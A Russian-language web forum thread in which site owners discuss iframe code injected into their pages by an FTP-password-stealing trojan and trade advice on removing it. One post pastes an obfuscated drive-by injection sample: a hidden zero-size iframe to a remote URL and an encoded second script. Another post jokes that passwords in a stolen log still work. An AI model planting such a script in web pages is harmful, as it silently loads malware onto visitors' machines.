Web-вирусы. iframe

Статус
В этой теме нельзя размещать новые ответы.

Jeurey

Хранитель порядка
Регистрация
13 Сен 2006
Сообщения
419
Реакции
614
Юзайте Линукс и проблем станет знаааааачительно меньше :)
 

dazed

Гуру форума
Регистрация
31 Мар 2007
Сообщения
208
Реакции
54
это все проделки вируса LdPinch! причем хорошо шифруеться и не всегда видин антивирусами. особенно в этом деле плохо показал себя nod32..
Вирус ворует из многих известных фтп клиентов пароли и потом в атоматическом режиме добавляет на ваши страницы зловредный код с фреймом.
Лучше всего не сохраняйте пароли на автомате! хотя бы банальное сохранение в txt файл и то больше гарантий даст чем сохранение в фтп..
 

mavl

Постоялец
Регистрация
1 Май 2007
Сообщения
52
Реакции
33
сорри, если не в тему...
тоже обнаружил на своих сайтах инородный код. 3 сайта - joomla - туча индексных файлов. Хостер (свеб) не парится - говорит, удаляй в ручную.
Качал файлы к себе на комп, думал дримвиром отредактировать, но тут антивирус (nod) перехватывает - и сам не лечит, и мне не даёт редактировать.
Может есть какой скрипт, что бы на автомате на серваке с файлов удалить код ?
 

dazed

Гуру форума
Регистрация
31 Мар 2007
Сообщения
208
Реакции
54
Чтобы автоматом исправил текст на серверах нужно написать скрипт который находит и меняет в файлах определенный текст (HTML код вируса) на другой текст (к примеру на пробел), попробуй поискать подобные скрипты либо же напиши их сам.

То что NOD орет на файл это понятно, хотя нечего страшного еслы в текстовом редакторе откроете не будет.
Советую:
1. Закачайте файлы на комп.
2. Выйдите из и-нета (для большей надежности)
3. Выключите NOD (чтобы не мешал удалять вирус).
4. Открывайте зараженные файлы notepad' ом и удалите строки вируса, обычно они находяться в самом внизу, там должно быть что типа <iframe=ссылка > удалите подозрительную запись и можете заливать файл обратно на хостинг.
 

Jeurey

Хранитель порядка
Регистрация
13 Сен 2006
Сообщения
419
Реакции
614
lift, злой ты )))))
Бедное блондинко из красногорска :D
 

lift

Читатель
Регистрация
1 Июл 2007
Сообщения
2.222
Реакции
1.487
  • Заблокирован
  • #38
Jeurey
Выбрал отчет чисто методом тыка пальцам :) про блодинку сам смеялся ибо отчет ноябрьский а все пасы рабочие :)
 
B

bbs

Прохожие
<script>if(document.cookie.indexOf('tnd=on')==-1){expires=new Date();expires.setTime(expires.getTime()+86400000) ;document.cookie='tnd='+escape('on')+'; expires='+expires.toGMTString()+'; path=/';status=location;document.write(unescape('%3c%69% 66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f %2f%75%70%64%61%74%65%7a%2e%69%6e%66%6f%2f%65%74%6 3%2f%74%64%73%2e%70%68%70%22%20%77%69%64%74%68%3d% 30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62 %6f%72%64%65%72%3d%30%20%6f%6e%4c%6f%61%64%3d%22%7 3%74%61%74%75%73%3d%64%65%66%61%75%6c%74%53%74%61% 74%75%73%3b%22%3e%3c%2f%69%66%72%61%6d%65%3e'));}</script><script>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74& 86&7e&76&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f &78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&76&39&47&4 1&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d& 42&42&43&3d&42&42&47&3d&47&43&3d&44&43&3d&42&42&49 &3d&4:&48&3d&42&42&45&3d&44&43&3d&49&44&3d&42&42&4 7&3d&42&42&45&3d&47&42&3d&44&45&3d&44&4:&3d&44&43& 3d&42&41&45&3d&42&41&42&3d&42&41&46&3d&42&41&44&3d &42&41&45&3d&42&42&47&3d&47&42&3d&44&4:&3d&45&4:&3 d&44&4:&3d&44&43&3d&42&42&46&3d&42&42&47&3d&42&43& 42&3d&42&41&49&3d&42&41&42&3d&47&42&3d&44&4:&3d&42 &42&49&3d&42&41&46&3d&42&42&46&3d&42&41&46&3d&4:&4 9&3d&42&41&46&3d&42&41&49&3d&42&41&46&3d&42&42&47& 3d&42&43&42&3d&46&49&3d&44&43&3d&42&41&45&3d&42&41 &46&3d&42&41&41&3d&42&41&41&3d&42&41&42&3d&42&42&4 1&3d&46&4:&3d&44&4:&3d&47&43&3d&47&41&3d&45&48&3d& 42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41 &4:&3d&42&41&42&3d&47&43&3d&44&43&3d&44&43&3d&47&4 1&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d& 42&41&4:&3d&42&41&42&3d&44&43&3d&42&42&46&3d&42&42 &45&3d&4:&4:&3d&47&42&3d&44&4:&3d&42&41&45&3d&42&4 2&47&3d&42&42&47&3d&42&42&43&3d&46&49&3d&45&48&3d& 45&48&3d&42&42&46&3d&42&42&42&3d&4:&4:&3d&42&41&48 &3d&42&42&46&3d&46&43&3d&45&46&3d&46&44&3d&45&47&3 d&4:&49&3d&42&41&46&3d&42&43&43&3d&45&48&3d&42&41& 46&3d&42&42&41&3d&42&41&41&3d&42&41&42&3d&42&43&41 &3d&45&47&3d&42&42&43&3d&42&41&45&3d&42&42&43&3d&4 4&4:&3d&44&43&3d&42&42&4:&3d&42&41&46&3d&42&41&41& 3d&42&42&47&3d&42&41&45&3d&47&42&3d&44&4:&3d&45&4: &3d&44&45&3d&42&44&3d&42&41&3d&42&41&41&3d&42&42&4 2&3d&4:&4:&3d&42&42&48&3d&42&41&4:&3d&42&41&42&3d& 42&42&41&3d&42&42&47&3d&45&47&3d&42&42&4:&3d&42&42 &45&3d&42&41&46&3d&42&42&47&3d&42&41&42&3d&45&41&3 d&49&44&3d&42&42&47&3d&42&42&45&3d&45&47&3d&42&42& 46&3d&42&42&48&3d&4:&49&3d&42&42&46&3d&42&42&47&3d &42&42&45&3d&42&41&46&3d&42&42&41&3d&42&41&44&3d&4 5&41&3d&46&44&3d&46&41&3d&45&45&3d&45&4:&3d&45&49& 3d&46&44&3d&45&42&3d&45&45&3d&49&44&3d&42&42&47&3d &42&42&45&3d&45&47&3d&42&42&46&3d&42&42&48&3d&4:&4 9&3d&42&42&46&3d&42&42&47&3d&42&42&45&3d&42&41&46& 3d&42&42&41&3d&42&41&44&3d&45&41&3d&45&49&3d&45&45 &3d&46&44&3d&46&41&3d&45&42&3d&45&42&3d&44&43&3d&4 7&41&3d&45&48&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d& 42&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3:&3:&4c &4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>

подскажите начинающему как это можно дешифровать в удобочитаемые комманды?
Спасибо.
 

lift

Читатель
Регистрация
1 Июл 2007
Сообщения
2.222
Реакции
1.487
  • Заблокирован
  • #40
bbs
Как тебе на такой вопрос ответить? Это все кодиться начиная от обычного base64 и аканчивая приватными крипторами. Тут можно гадать долго. Только смысла нет всеравно. Зачем тебе знать чистый код инфрейма если результат и так понятен: подгруз на твой комп файла.
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху